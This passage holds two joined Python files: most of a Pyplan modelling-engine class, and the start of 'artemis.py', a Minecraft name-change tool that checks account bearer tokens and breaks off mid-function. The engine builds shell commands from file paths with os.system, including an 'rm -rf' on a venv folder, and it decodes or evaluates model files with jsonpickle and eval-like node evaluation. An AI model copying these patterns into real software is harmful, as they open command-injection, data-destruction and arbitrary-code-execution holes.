evaluator = Evaluator.createInstance(self._scenarioDic[nodeId])
return evaluator.getIndexes(self.nodeDic[nodeId], self._scenarioDic[nodeId])
else:
_node = self.getNode(nodeId)
return _node.indexes
def getIndexValues(self, data: IndexValuesReq):
"""Return values of a index node."""
tmpNodeId = data.index_id if data.node_id is None or data.node_id == '' else data.node_id
if self.existNode(tmpNodeId):
result = self.nodeDic[tmpNodeId].result
if data.node_id in self._scenarioDic:
result = self._scenarioDic[data.node_id]
evaluator = Evaluator.createInstance(result)
return evaluator.getIndexValues(self.nodeDic, data, result)
def getIndexType(self, nodeId, indexId):
"""Return index type"""
tmpNodeId = indexId if nodeId is None or nodeId == "" else nodeId
if self.existNode(tmpNodeId):
evaluator = Evaluator.createInstance(
self.nodeDic[tmpNodeId].result)
return evaluator.getIndexType(self.nodeDic, nodeId, indexId)
def getIndexesWithLevels(self, nodeId):
"""Return indexes of a node"""
if self.existNode(nodeId):
if nodeId in self._scenarioDic:
evaluator = Evaluator.createInstance(self._scenarioDic[nodeId])
return evaluator.getIndexesWithLevels(self.nodeDic[nodeId], self._scenarioDic[nodeId])
else:
evaluator = Evaluator.createInstance(
self.nodeDic[nodeId].result)
return evaluator.getIndexesWithLevels(self.nodeDic[nodeId])
def isTable(self, nodeId):
"""return true if node is a table"""
res = "0"
if self.existNode(nodeId):
evaluator = Evaluator.createInstance(self.nodeDic[nodeId].result)
res = evaluator.isTable(self.getNode(nodeId))
return res
def getArrows(self, moduleId):
"""Return all arrows of moduleId"""
res = []
modulesInLevel = []
inputsInOtherLevel = []
outputsInOtherLevel = []
thisLevel = self.findNodes("moduleId", moduleId)
thisIds = [node.identifier for node in thisLevel]
for node in thisLevel:
if node.nodeClass == "module":
modulesInLevel.append(node.identifier)
# node to node
for node in thisLevel:
if node.nodeClass not in ["module", "text"]:
for outputNodeId in node.outputs:
# aliases
fullOutputs = []
fullOutputs = self.findNodes('originalId', outputNodeId)
fullOutputs.append(self.getNode(outputNodeId))
for o in fullOutputs:
if not o is None:
element = {'from': node.identifier,
'to': o.identifier}
if o.identifier in thisIds:
if node.nodeInfo.showOutputs and o.nodeInfo.showInputs:
if self.existArrow(element["from"], element["to"], res) == False:
res.append(element)
elif o.identifier not in thisIds:
if self.existArrow(element["from"], element["to"], outputsInOtherLevel) == False:
# if theres an alias in this level don't include the arrow
if not len(self.getAliasInLevel(o.identifier, moduleId)) > 0:
outputsInOtherLevel.append(element)
for inputNodeId in node.inputs:
# aliases
fullInputs = []
fullInputs = self.findNodes('originalId', inputNodeId)
fullInputs.append(self.getNode(inputNodeId))
for i in fullInputs:
if not i is None:
element = {'from': i.identifier,
'to': node.identifier}
if i.identifier in thisIds:
if i.nodeInfo.showOutputs and node.nodeInfo.showInputs:
if self.existArrow(element["from"], element["to"], res) == False:
res.append(element)
elif i.identifier not in thisIds:
if self.existArrow(element["from"], element["to"], inputsInOtherLevel) == False:
# if theres an alias in this level don't include the arrow
if not len(self.getAliasInLevel(i.identifier, moduleId)) > 0:
inputsInOtherLevel.append(element)
# node to module
if outputsInOtherLevel:
for d in outputsInOtherLevel:
newTo = []
nodeFrom = d["from"]
nodeTo = d["to"]
if self.getNode(nodeTo).isin in self.nodeDic:
newTo = self.getParentModule(nodeTo, modulesInLevel)
if newTo:
element = {'from': nodeFrom, 'to': newTo}
if self.getNode(nodeFrom).nodeInfo.showOutputs and self.getNode(newTo).nodeInfo.showInputs:
if self.existArrow(element["from"], element["to"], res) == False:
res.append(element)
# module to node
if inputsInOtherLevel:
for d in inputsInOtherLevel:
newFrom = []
nodeFrom = d["from"]
nodeTo = d["to"]
if self.getNode(nodeFrom).isin in self.nodeDic:
newFrom = self.getParentModule(nodeFrom, modulesInLevel)
if newFrom:
element = {'from': newFrom, 'to': nodeTo}
if self.getNode(newFrom).nodeInfo.showOutputs and self.getNode(nodeTo).nodeInfo.showInputs:
if self.existArrow(element["from"], element["to"], res) == False:
res.append(element)
# module to module
modulesComplete = []
for mod in modulesInLevel:
modulesComplete.append(
{"module": mod, "nodes": self.getNodesInModule(mod, [])})
for mod in modulesComplete:
for node in mod["nodes"]:
if self.getNode(mod["module"]).nodeInfo.showOutputs:
tempOutputs = node.outputs
if tempOutputs:
for output in tempOutputs:
for auxModule in modulesComplete:
if(mod["module"] != auxModule["module"] and self.getNode(auxModule["module"]).nodeInfo.showInputs):
# module to module
if self.getNode(output) in auxModule["nodes"]:
element = {
"from": mod["module"], "to": auxModule["module"]}
if self.existArrow(element["from"], element["to"], res) == False:
res.append(element)
"""# module to alias
aliases = self.getAliasInLevel(
output, moduleId)
if len(aliases) > 0:
for alias in aliases:
if alias.nodeInfo.showInputs:
element = {
"from": mod["module"], "to": alias.identifier}
if self.existArrow(element["from"], element["to"], res) == False:
res.append(element)
# alias to alias
outputAliases = self.getAliasInLevel(
node.identifier, moduleId)
if len(outputAliases) > 0:
for outAl in outputAliases:
if outAl.nodeInfo.showOutputs:
element = {
"from": outAl.identifier, "to": alias.identifier}
if self.existArrow(element["from"], element["to"], res) == False:
res.append(element)
# alias to module
if self.getNode(mod["module"]).nodeInfo.showInputs:
tempInputs = node.inputs
if tempInputs:
for inp in tempInputs:
aliases = self.getAliasInLevel(inp, moduleId)
if len(aliases) > 0:
for auxModule in modulesComplete:
for alias in aliases:
if alias.nodeInfo.showOutputs:
element = {
"from": alias.identifier, "to": mod["module"]}
if self.existArrow(element["from"], element["to"], res) == False:
res.append(element)"""
return res
def existArrow(self, aFrom, aTo, arrowsList):
"""Return true if exists de arrow from-to"""
if arrowsList:
for arrow in arrowsList:
if arrow['from'] == aFrom and arrow['to'] == aTo:
return True
return False
def getAliasInLevel(self, nodeIdentifier, levelId):
"""Returns the aliases in the level"""
res = []
aliasNodes = self.findNodes("originalId", nodeIdentifier)
if aliasNodes is not None:
for alias in aliasNodes:
if alias.moduleId == levelId:
res.append(alias)
break
return res
def getParentModulesWithAlias(self, moduleId, modulesArray):
"""Return the parent module with alias"""
if moduleId != '_model_':
if moduleId not in modulesArray:
modulesArray.append(moduleId)
alias = []
alias = self.findNodes('originalId', moduleId)
if alias:
for a in alias:
if a.identifier not in modulesArray:
modulesArray.append(a.identifier)
if self.getNode(moduleId).isin in self.nodeDic:
return self.getParentModulesWithAlias(self.getNode(moduleId).isin, modulesArray)
else:
return modulesArray
else:
return modulesArray
def getParentModule(self, moduleId, modulesInLevel):
"""Return parent module"""
if moduleId == '_model_':
return None
else:
if moduleId in modulesInLevel:
return moduleId
else:
if self.getNode(moduleId).isin in self.nodeDic:
return self.getParentModule(self.getNode(moduleId).isin, modulesInLevel)
else:
return None
def getNodesInModule(self, moduleId, nodesInSubLevels):
"""Return nodes un module"""
subLevelNodes = []
modulesInSubLevels = []
subLevelNodes = self.findNodes('moduleId', moduleId)
if subLevelNodes:
for node in subLevelNodes:
if node.nodeClass == 'module':
modulesInSubLevels.append(node)
else:
if node.nodeClass != 'text':
nodesInSubLevels.append(node)
if modulesInSubLevels:
for module in modulesInSubLevels:
self.getNodesInModule(module.identifier, nodesInSubLevels)
return nodesInSubLevels
# UNUSED FULL ARROWS (NODE TO NODE WITH ALIASES)
"""
def getArrows(self,moduleId):
res=[]
thisLevel = self.findNodes("moduleId",moduleId)
thisIds = [node.identifier for node in thisLevel]
for nodeId in self.nodeDic:
if self.getNode(nodeId).nodeClass not in ["module","text"]:
nodeInputs = []
nodeOutputs = []
fullNode = []
fullInputs = []
fullOutputs = []
# To clear non existent aliases
if self.getNode(nodeId).originalId:
if self.getNode(nodeId).originalId not in self.nodeDic:
continue
nodeInputs = self.getNode(nodeId).inputs
nodeOutputs = self.getNode(nodeId).outputs
fullNode = self.getNodeParentsAndAliases(nodeId)
if fullNode:
for n in fullNode:
if n not in thisIds:
fullNode.remove(n)
if fullNode:
if nodeInputs:
for i in nodeInputs:
fullInputs = self.getNodeParentsAndAliases(i)
if fullInputs:
for n in fullInputs:
if n not in thisIds:
fullInputs.remove(n)
if fullInputs:
for n in fullNode:
for inp in fullInputs:
if self.getNode(n).nodeInfo.showInputs and self.getNode(inp).nodeInfo.showOutputs:
element = {"from":inp,"to":n}
if element not in res:
res.append(element)
if nodeOutputs:
for o in nodeOutputs:
fullOutputs = self.getNodeParentsAndAliases(o)
if fullOutputs:
for n in fullOutputs:
if n not in fullOutputs:
fullOutputs.remove(n)
if fullOutputs:
for n in fullNode:
for out in fullOutputs:
if self.getNode(out).nodeInfo.showInputs and self.getNode(n).nodeInfo.showOutputs:
element = {"from":n,"to":out}
if element not in res:
res.append(element)
return res
def getNodeParentsAndAliases(self,nodeId):
response = []
aliases = []
parentModulesAndAliases = []
if nodeId not in response:
response.append(nodeId)
aliases = self.findNodes('originalId',nodeId)
if aliases:
for a in aliases:
if a.identifier not in response:
response.append(a.identifier)
if self.getNode(nodeId).isin in self.nodeDic:
parentModulesAndAliases = self.getParentModulesWithAlias(self.getNode(nodeId).isin,[])
if parentModulesAndAliases:
for m in parentModulesAndAliases:
if m not in response:
response.append(m)
return response
"""
def findNodes(self, prop, value):
"""Finds nodes by property/value"""
res = []
for k, v in self.nodeDic.items():
if getattr(v, prop) == value:
if(not v.system):
res.append(self.nodeDic[k])
return res
def searchNodes(self, filterOptions):
"""Search nodes using filter options """
res = []
res = Intellisense().search(self, filterOptions)
return res
def getInputs(self, nodeId):
res = []
if self.existNode(nodeId):
for nodeInput in self.getNode(nodeId).inputs:
if self.existNode(nodeInput):
inp = self.getNode(nodeInput)
res.append({
"id": nodeInput,
"name": inp.title if not inp.title is None else nodeInput,
"nodeClass": inp.nodeClass,
"moduleId": inp.moduleId
})
return res
def getOutputs(self, nodeId):
"""Get output list of a node"""
res = []
if self.existNode(nodeId):
for nodeOutput in self.getNode(nodeId).outputs:
if self.existNode(nodeOutput):
out = self.getNode(nodeOutput)
res.append({
"id": nodeOutput,
"name": out.title if not out.title is None else nodeOutput,
"nodeClass": out.nodeClass,
"moduleId": out.moduleId
})
return res
def moveNodes(self, nodeList, moduleId):
"""Move nodes to other moduleId"""
res = []
moduleId = self.clearId(moduleId)
if self.existNode(moduleId):
for nodeId in nodeList:
if self.existNode(nodeId):
self.getNode(nodeId).moduleId = moduleId
res.append(nodeId)
return res
def copyNodes(self, nodeList, moduleId):
"""Copy nodes"""
res = []
if self.existNode(moduleId):
try:
self._isLoadingModel = True
rx = r"('[^'\\]*(?:\\.[^'\\]*)*'|\"[^\"\\]*(?:\\.[^\"\\]*)*\")|\b{0}\b"
newNodesDic = dict()
def nodeCreator(_nodeList, _moduleId):
for nodeId in _nodeList:
nodeId = self.clearId(nodeId)
if self.existNode(nodeId):
obj = self.getNode(nodeId).toObj()
newId = self.getNextIdentifier(
f'{obj["identifier"]}')
newNodesDic[obj["identifier"]] = newId
obj["identifier"] = newId
if obj["moduleId"] == _moduleId:
obj["x"] = int(obj["x"]) + 10
obj["y"] = int(obj["y"]) + 10
else:
obj["moduleId"] = _moduleId
nodeObj = self.createNode(
obj["identifier"], moduleId=_moduleId)
nodeObj.fromObj(obj)
res.append(nodeObj.identifier)
if nodeObj.nodeClass == "module":
_childrens = [
node.identifier for node in self.findNodes("moduleId", nodeId)]
nodeCreator(_childrens, newId)
nodeCreator(nodeList, moduleId)
# update definitions and alias original
for sourceNode, targetNode in newNodesDic.items():
newNode = self.getNode(targetNode)
currentDef = newNode.definition
if not currentDef is None and currentDef != "":
tmpCode = newNode.compileDef(currentDef)
if not tmpCode is None:
names = newNode.parseNames(tmpCode)
for node in names:
if node in newNodesDic:
newRelatedId = newNodesDic[node]
currentDef = re.sub(rx.format(node), lambda m:
(
m.group(1)
if m.group(1)
else
newRelatedId
), currentDef, 0, re.IGNORECASE)
# end parse definition
newNode.definition = currentDef
# update allias
if not newNode.originalId is None and newNode.originalId in newNodesDic:
newNode.originalId = newNodesDic[newNode.originalId]
# regenerate
newNode.generateIO()
finally:
self._isLoadingModel = False
return res
def copyAsValues(self, nodeId, asNewNode=False):
""" Copy node as values """
if self.existNode(nodeId):
node = self.nodeDic[nodeId]
if node.originalId:
return self.copyAsValues(node.originalId, asNewNode)
result = node.result
if asNewNode:
newNode = self.createNode(moduleId=node.moduleId, nodeClass=node.nodeClass, x=int(
node.x)+40, y=int(node.y)+60)
newNode.w = node.w
newNode.h = node.h
newNode.definition = node.definition
node = newNode
evaluator = Evaluator.createInstance(result)
return evaluator.copyAsValues(result, self.nodeDic, node.identifier)
return False
def createInputNodes(self, nodeList):
"""Create input nodes"""
res = []
if not nodeList is None:
for nodeId in nodeList:
if self.existNode(nodeId):
firstNode = self.getNode(nodeId)
nodeOrig = self.getOriginalNode(nodeId)
inputNode = self.createNode(moduleId=firstNode.moduleId, nodeClass="formnode", x=int(
firstNode.x)-70, y=int(firstNode.y)+70, originalId=nodeOrig.identifier)
inputNode.w = 240
inputNode.h = 36
inputNode.color = nodeOrig.color
inputNode.definition = "result = " + \
str(nodeOrig.identifier)
res.append(inputNode.identifier)
return res
def createAlias(self, nodeList):
"""Create node alias"""
res = []
if not nodeList is None:
for nodeId in nodeList:
if self.existNode(nodeId):
firstNode = self.getNode(nodeId)
nodeOrig = self.getOriginalNode(nodeId)
aliasNode = self.createNode(moduleId=firstNode.moduleId, nodeClass="alias", x=int(
firstNode.x)+30, y=int(firstNode.y)+30, originalId=nodeOrig.identifier)
aliasNode.w = int(nodeOrig.w)
aliasNode.h = int(nodeOrig.h)
aliasNode.definition = "result = " + \
str(nodeOrig.identifier)
aliasNode.color = BaseNode.getDefaultColor(
nodeOrig.nodeClass) if nodeOrig.color is None else nodeOrig.color
res.append(aliasNode.identifier)
return res
def getOriginalNode(self, nodeId):
"""Get original node from an alias or input node"""
if self.existNode(nodeId):
nodeOrig = self.getNode(nodeId)
if nodeOrig.originalId is None:
return nodeOrig
else:
return self.getOriginalNode(nodeOrig.originalId)
def isCalcNodes(self, nodeList):
"""Return list of Booleans. True for node is calculated otherwise False"""
res = []
if not nodeList is None:
for nodeId in nodeList:
isCalc = False
if self.existNode(nodeId):
isCalc = self.getNode(nodeId).isCalc
res.append(isCalc)
return res
def exportModule(self, moduleId, filename):
"""Export module to file"""
_moduleIOEngine = IOModule(self)
return _moduleIOEngine.exportModule(moduleId, filename)
def importModule(self, moduleId, filename, importType):
"""Import module from file"""
_moduleIOEngine = IOModule(self)
return _moduleIOEngine.importModule(moduleId, filename, importType)
def exportFlatNode(self, nodeId, numberFormat, columnFormat, fileName):
"""Export node values in flat format"""
if self.existNode(nodeId):
evaluator = Evaluator.createInstance(self.nodeDic[nodeId].result)
return evaluator.exportFlatNode(self.nodeDic, nodeId, numberFormat, columnFormat, fileName)
return False
def dumpNodeToFile(self, nodeId, fileName):
"""Dump current node value to file"""
if self.existNode(nodeId):
evaluator = Evaluator.createInstance(self.nodeDic[nodeId].result)
return evaluator.dumpNodeToFile(self.nodeDic, nodeId, fileName)
return False
def saveModel(self, fileName=None):
"""Save model. If fileName is specified, then save to fileName, else return string of ppl """
toSave = {
"modelProp": self.modelProp,
"nodeList": []
}
for k, v in self.nodeDic.items():
if(not v.system):
toSave["nodeList"].append(v.toObj())
if fileName:
with open(fileName, 'w') as f:
f.write(jsonpickle.encode(toSave))
f.close()
toSave = None
else:
return jsonpickle.encode(toSave)
def openModel(self, fileName=None, textModel=None):
"""Open model.
If fileName is especified then open from fileName, else open from textModel text """
self.release()
opened = {}
if textModel:
opened = jsonpickle.decode(textModel)
else:
with open(fileName, 'r') as f:
opened = jsonpickle.decode(f.read())
f.close()
self._modelProp = opened["modelProp"]
self._isLoadingModel = True
# create base model node
multiplier = 1
hasBaseNode = False
for obj in opened["nodeList"]:
if obj["moduleId"] == '_model_':
node = self.createNode(obj["identifier"], moduleId="_model_")
# multiplier for old models
if obj['w'] == 50 and obj['h'] == 25:
# the model is an old model
multiplier = 2
obj['w'] = str(int(obj['w']) * multiplier)
obj['h'] = str(int(obj['h']) * multiplier)
node.fromObj(obj)
self._modelNode = node
hasBaseNode = True
break
if not hasBaseNode:
self.initialize()
# creating system nodes
self.createSystemNodes(fileName)
rootModelId = self.modelNode.identifier
# create nodes
for obj in opened['nodeList']:
if obj["moduleId"] != '_model_' and obj['identifier']:
if obj["nodeClass"] in ['alias', 'formnode']:
if hasattr(obj, 'originalId'):
node = self.createNode(
obj['identifier'], moduleId=rootModelId, originalId=obj['originalId'])
else:
index = obj['definition'].find('=')
originalId = obj['definition'][index+1:].strip()
node = self.createNode(
obj['identifier'], moduleId=rootModelId, originalId=originalId)
else:
node = self.createNode(
obj['identifier'], moduleId=rootModelId)
obj['w'] = str(int(obj['w']) * multiplier)
obj['h'] = str(int(obj['h']) * multiplier)
node.fromObj(obj)
node = None
self.createDefaultNodes()
# auto import pyplan_xarray_extensions
try:
_ppxarray = ""
_ppxarray = os.path.join(os.path.dirname(os.path.realpath(__file__)),"extras", "pyplan_xarray_extensions.ppl")
if os.path.isfile(_ppxarray):
self.importModule('pyplan_library', _ppxarray, "2")
except Exception as ex:
raise ex
finally:
opened = None
self._isLoadingModel = False
# evaluate nodes on start
try:
for key in self.nodeDic:
if self.nodeDic[key] and self.nodeDic[key].evaluateOnStart:
_dummy=self.nodeDic[key].result
except Exception as ex:
print(str(ex))
#TODO: send via channels msg to client
pass
return True
def closeModel(self):
"""Close model"""
self.release()
def getCustomImports(self):
"""Return object with custom imported python modules."""
if self.existNode("imports"):
return self.getNode("imports").result
def createSystemNodes(self, fileName):
"""Create system nodes"""
# current path
systemPathNode = self.createNode(
identifier="current_path", moduleId=self.modelNode.identifier)
path = str((environ.Path(fileName)-1)() + os.path.sep)
if self.isLinux():
path = fileName[:fileName.rfind("/")] + "/"
self.createSymlinks(path)
else:
path = path.replace("\\","\\\\")
systemPathNode.system = True
systemPathNode.definition = 'result="""' + str(path) + '"""'
node = self.createNode(identifier="pyplan_user",
moduleId=self.modelNode.identifier)
node.system = True
node = self.createNode(identifier="cub_refresh",
moduleId=self.modelNode.identifier)
node.system = True
node = self.createNode(identifier="pyplan_refresh",
moduleId=self.modelNode.identifier)
node.system = True
node = self.createNode(
identifier="_scenario_", moduleId=self.modelNode.identifier, nodeClass="index")
node.system = True
node.title = "Scenario"
node.definition = "result = pp.index(['Current'])"
node = self.createNode(identifier="task_log_endpoint",
moduleId=self.modelNode.identifier, nodeClass="variable")
node.system = True
node.title = "TaskLog endpoint"
node.definition = "result = ''"
def createSymlinks(self, path):
if os.getenv("PYPLAN_IDE","0")!="1":
# Add user or public path to system paths
pos = path.index("/", path.index("/", path.index("/",
path.index("/", path.index("/")+1)+1)+1)+1)
#Get python folder path
python_folder = f"python{sys.version[:3]}"
try:
folder_list = os.listdir(os.path.join(path[:pos], ".venv", "lib"))
python_folder = folder_list[len(folder_list)-1]
except Exception as ex:
pass
# Add user/public library to system paths
user_lib_path = os.path.join(path[:pos], ".venv", "lib" ,python_folder,"site-packages")
venv_path = os.path.join("/venv","lib","python3.7","site-packages")
if not os.path.isdir(user_lib_path):
os.makedirs(user_lib_path, exist_ok=True)
#copy base venv folders
os.system(f"cp -r -u {venv_path}-bkp/* {user_lib_path}")
#create symlink from user /public site-package
os.system(f"rm -rf {venv_path}")
os.system(f"ln -s -f {user_lib_path} {venv_path}")
def createDefaultNodes(self):
""" Create default nodes as pyplan library, default imports, etc """
# modulo pyplan library
if not self.existNode("pyplan_library"):
pyplan_library_node = self.createNode(
identifier="pyplan_library", moduleId=self.modelNode.identifier, x=50, y=500, nodeClass="module")
pyplan_library_node.title = "Pyplan library"
pyplan_library_node.color = "#9fc5e8"
pyplan_library_node.nodeInfo["showInputs"] = 0
pyplan_library_node.nodeInfo["showOutputs"] = 0
# Nodo default imports
importNode = None
if self.existNode("imports"):
importNode = self.getNode("imports")
else:
importNode = self.createNode(
identifier="imports", moduleId="pyplan_library", x=200, y=100)
importNode.title = "Default imports"
importNode.definition = """import numpy, pandas, cubepy, xarray
#fill the following dict keys with the alias you want to define for each Library
result = {
"np":numpy,
"pd":pandas,
"cubepy":cubepy,
"xr":xarray
}"""
if importNode.moduleId != "pyplan_library":
importNode.moduleId = "pyplan_library"
importNode.x = 103
importNode.y = 190
def isLinux(self):
if platform == "linux" or platform == "linux2" or platform == "darwin":
return True
else:
return False
# profileNode
def profileNode(self, nodeId):
"""Perform profile of an node"""
if self.getNode(nodeId).originalId is not None:
nodeId = self.getNode(nodeId).originalId
profile = self.getNode(nodeId).profileNode([], [], self.getNode(nodeId).evaluationVersion, nodeId)
for node in profile:
if self.nodeDic[node["nodeId"]].isCircular():
node["calcTime"] = node["evaluationTime"]
else:
inputsTime = 0
for nodeInput in self.getNode(node["nodeId"]).inputs:
if(self.getNode(node["nodeId"]).evaluationVersion == self.getNode(nodeInput).evaluationVersion and node["nodeId"] == self.getNode(nodeInput).profileParent):
inputsTime = inputsTime + self.getNode(nodeInput).lastEvaluationTime
node["calcTime"] = node["evaluationTime"] - inputsTime
if node["calcTime"]<0:
node["calcTime"]=0
#Fix acumulated time
total_time = 0
for nn in reversed(range(len(profile))):
node = profile[nn]
total_time = total_time + node["calcTime"]
node["evaluationTime"] = total_time
return jsonpickle.encode(profile)
def evaluate(self, definition, params=None):
"""Evaluate expression"""
res = None
evalNode = BaseNode(
model=self, identifier="__evalnode__", nodeClass="variable")
evalNode._definition = definition
evalNode.calculate(params)
res = evalNode.result
evalNode.release()
evalNode = None
return res
def callFunction(self, nodeId, params=None):
"""Call node function with params"""
res = None
if self.existNode(nodeId):
nodeFn = self.getNode(nodeId).result
if params is None:
res = nodeFn()
else:
res = nodeFn(**params)
return res
def getIdentifierByNode(self, result):
"""Return Identifier of node searching by your result"""
res = ""
for nodeId in self.nodeDic:
if self.nodeDic[nodeId].isCalc:
if self.nodeDic[nodeId].result is result:
res = nodeId
break
return res
def loadScenario(self, nodeId, scenarioData):
""" Load and fill scenarioDic """
res = False
if not scenarioData is None:
if self.existNode(nodeId):
scenarioResult = []
scenarioNames = []
scenList = str(scenarioData).split("##")
for scenItem in scenList:
arr = str(scenItem).split("||")
if len(arr) == 3:
scenarioName = arr[1]
fileName = arr[2]
_result = None
if arr[0] == "-1": # current
_result = self.getNode(nodeId).result
else:
nodeDef = ""
with open(fileName, 'r') as f:
nodeDef = f.read()
f.close()
_result = self.evaluate(nodeDef)
scenarioResult.append(_result)
scenarioNames.append(scenarioName)
# fill scenario node
scenarioIndex = self.getNode("_scenario_")
scenarioIndex.definition = "result = pp.index(['" + "','".join(
scenarioNames) + "'])"
if len(scenarioResult) > 0:
finalResult = None
if isinstance(scenarioResult[0], xr.DataArray):
finalResult = xr.concat(
scenarioResult, scenarioIndex.result.dataArray)
else:
finalResult = xr.DataArray(
scenarioResult, scenarioIndex.result.coord)
self._scenarioDic[nodeId] = finalResult
res = True
return res
def unloadScenario(self):
"""Unload all scenarios and clean calculated nodes in the scenario """
for key in self._scenarioDic:
self._scenarioDic[key] = None
self._scenarioDic = dict()
scenarioIndex = self.getNode("_scenario_")
scenarioIndex.definition = "result = pp.index(['Current'])"
def geoUnclusterData(self, nodeId, rowIndex, attIndex, latField="latitude", lngField="longitude", geoField="geoField", labelField="labelField", sizeField="sizeField", colorField="colorField", iconField="iconField"):
"""get unclusted data for geo representation."""
if self.existNode(nodeId):
result = self.nodeDic[nodeId].result
if not result is None:
self.evaluationVersion += 1
evaluator = Evaluator.createInstance(result)
return evaluator.geoUnclusterData(result, self.nodeDic, nodeId, rowIndex, attIndex, latField, lngField, geoField, labelField, sizeField, colorField, iconField)
else:
return ""
def getToolbars(self, extraPath):
""" return list of default app toolbars"""
# load default toolbar
self._nodeClassDic = {}
res = []
fileName = os.path.join(os.path.dirname(os.path.realpath(__file__)),"extras", "toolbars.json")
if os.path.isfile(fileName):
with open(fileName, 'r') as f:
res = jsonpickle.decode(f.read())
f.close()
for tGroup in res:
for tItem in tGroup["items"]:
tItem["baseClass"] = tItem["format"]["nodeClass"]
self._nodeClassDic[tItem["nodeClass"]] = tItem["format"]
return res
def callWizard(self, param):
""" Start and call wizard toolbar """
obj = jsonpickle.decode(param)
key = obj["wizard"]
action = obj["action"]
params = obj["params"]
if self._wizard is None or self._wizard.code != key:
self._wizard = self._getWizzard(key)
toCall = getattr(self._wizard, action)
return toCall(self, params)
# try:
# except Exception as ex:
# res = dict(error=str(ex))
# return jsonpickle.encode(res)
def createNewModel(self, modelFile, modelName):
self.release()
self._modelProp = {}
self._isLoadingModel = True
self.initialize(modelName)
self.createSystemNodes(modelFile)
self._isLoadingModel = False
self.saveModel(modelFile)
return True
def _getWizzard(self, key):
key = key.lower()
if key == 'calculatedfield':
return CalculatedField.Wizard()
elif key == 'selectcolumns':
return SelectColumns.Wizard()
elif key == 'selectrows':
return SelectRows.Wizard()
elif key == 'sourcecsv':
return sourcecsv.Wizard()
elif key == 'dataframeindex':
return DataframeIndex.Wizard()
elif key == 'dataframegroupby':
return DataframeGroupby.Wizard()
def getSystemResources(self):
"""Return current system resources"""
def _read_int(file):
data = 0
with open(file, 'r') as f:
data = int(f.read())
f.close()
return data
def _read_cache():
data = 0
with open('/sys/fs/cgroup/memory/memory.stat', 'r') as f:
line = f.readline()
data = int(str(line).split(" ")[1])
f.close()
return data
mem_limit = _read_int(
'/sys/fs/cgroup/memory/memory.limit_in_bytes') / 1024/1024/1024
if mem_limit > 200: # bug for container whitout limit
total_host = ""
with open('/proc/meminfo', 'r') as f:
line1 = f.readline()
total_host = str(line1).split(" ")[-2:-1][0]
mem_limit = int(total_host) / 1024/1024
mem_used = (_read_int(
'/sys/fs/cgroup/memory/memory.usage_in_bytes') - _read_cache()) / 1024/1024/1024
# get cpu usage
time_1 = datetime.datetime.now()
cpu_time_1 = _read_int('/sys/fs/cgroup/cpu/cpuacct.usage')
sleep(0.3)
time_2 = datetime.datetime.now()
cpu_time_2 = _read_int('/sys/fs/cgroup/cpu/cpuacct.usage')
delta_time = (time_2 - time_1).microseconds * 10
used_cpu = (cpu_time_2 - cpu_time_1) / delta_time
used_cpu = used_cpu if used_cpu < 100 else 100
current_node = self._currentProcessingNode
if self.existNode(current_node):
node = self.getNode(current_node)
if node.title:
current_node = f"{node.title} ({current_node})"
return {
"totalMemory": mem_limit,
"usedMemory": mem_used,
"usedCPU": used_cpu,
"pid": self.getPID(),
"currentNode": current_node
}
def installLibrary(self, lib, target):
"""install python library"""
self._currentInstallProgress = []
def _install(command):
p = subprocess.Popen(split(command), stdout=subprocess.PIPE,
stderr=subprocess.PIPE, universal_newlines=True)
nn = 0
while p.stdout is not None and nn < 120:
line = p.stdout.readline()
if not line:
p.stdout.flush()
aa,err = p.communicate()
if err:
self._currentInstallProgress.append(err.rstrip('\n'))
break
sleep(1)
nn += 1
self._currentInstallProgress.append(line.rstrip('\n'))
importlib.invalidate_caches()
cmd = f"pip install {lib}"
# If there are proxy configurations, use them to install from pip
http_proxy = os.getenv('PYPLAN_HTTP_PROXY')
https_proxy = os.getenv('PYPLAN_HTTPS_PROXY')
if http_proxy:
cmd += f' --proxy {http_proxy}'
elif https_proxy:
cmd += f' --proxy {https_proxy}'
thread = threading.Thread(target=_install, args=(cmd,))
thread.start()
return "ok"
def getInstallProgress(self, from_line):
"""Return install library progress"""
from_line = int(from_line)
if len(self._currentInstallProgress) == 0 or from_line > len(self._currentInstallProgress):
return []
else:
return self._currentInstallProgress[from_line:]
def setNodeIdFromTitle(self,node_id):
"""Generate node id from node identifier """
res = {"node_id":node_id}
model_props = self.getModelProperties()
if (not "changeIdentifier" in model_props or model_props["changeIdentifier"]=="1") and self.existNode(node_id):
node = self.nodeDic[node_id]
new_id = ""
try:
if node.title:
new_id = self._removeDiacritics(node.title)
except Exception as ex:
raise ValueError(f'Error finding node title: {str(ex)}')
if new_id:
if self.existNode(new_id):
new_id = self.getNextIdentifier(new_id)
node.identifier = new_id
res["node_id"] = new_id
return res
def _removeDiacritics(self, text):
"""Removes all diacritic marks from the given string"""
norm_txt = unicodedata.normalize('NFD', text)
shaved = ''.join(c for c in norm_txt if not unicodedata.combining(c))
# remove accents and other diacritics, replace spaces with "_" because identifiers can't have spaces
no_spaces = unicodedata.normalize('NFC', shaved).lower().replace(" ", "_")
final_text = no_spaces
# only allow [a-z], [0-9] and _
p = re.compile('[a-z0-9_]+')
for i in range(0, len(no_spaces)):
if not (p.match(no_spaces[i])):
final_text = final_text[:i] + '_' + final_text[i+1:]
# i the first char is not a-z then replaceit (all identifiers must start with a letter)
p2 = re.compile('[a-z]+')
if not p2.match(final_text[0]):
final_text = 'a' + final_text[1:]
return final_text
|
artemis.py | # Standard Library imports
import socket, ssl, datetime, threading, time, sys, subprocess
try:
import requests
import msmcauth
import fade
from colorama import Fore
from discord_webhook import DiscordWebhook, DiscordEmbed
except ImportError:
print("Installing dependencies... (requirements.txt)")
# sys.executable -m pip install -r requirements.txt (silenced stdout)
subprocess.check_call([sys.executable, '-m', 'pip', 'install', '-r', 'requirements.txt'], stderr=subprocess.STDOUT, stdout=subprocess.DEVNULL)
# import again
import requests
import msmcauth
import fade
from colorama import Fore
from discord_webhook import DiscordWebhook, DiscordEmbed
WEBHOOK_URL = ""
accdata = []
output = []
def nameChangeAllowed(bearer) -> bool:
try:
return requests.get(
"https://api.minecraftservices.com/minecraft/profile/namechange",
headers={"Authorization": "Bearer " + bearer},
).json()["nameChangeAllowed"]
except requests.exceptions.JSONDecodeError:
return False
def auto_ping(number_of_pings):
delays = []
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as so:
so.connect(('api.minecraftservices.com', 443))
context = ssl.create_default_context()
ssock = context.wrap_socket(
so, server_hostname='api.minecraftservices.com')
for _ in range(number_of_pings):
start = time.time()
ssock.send(bytes(
